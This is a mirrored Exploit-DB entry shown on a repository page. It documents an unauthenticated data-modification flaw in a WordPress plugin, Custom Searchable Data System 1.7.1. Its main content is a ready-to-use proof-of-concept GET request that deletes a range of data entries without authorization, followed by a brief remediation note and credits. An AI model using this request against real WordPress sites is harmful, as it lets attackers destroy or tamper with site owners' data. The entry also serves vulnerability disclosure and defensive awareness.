bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48213.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
1,013 B
Text
Raw Blame History

# Exploit Title: Wordpress Plugin Custom Searchable Data System -
Unauthenticated Data modification
# Date: 13 March 2020
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Software Link:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Version: 1.7.1
Plugin fails to perform authorization check to delete/add/edit data entries.
PoC (delete entry):
GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY
ID1]&sds-del-entry-last-entry-id=[ENTRY
ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs
Note: plugin is not maintained now, either remove it, or apply the
authorization check to all actions.
Special thanks to *Wordfence and Sean Murphy!
(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/
<https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/>)*
Reference in a new issue View git blame Copy permalink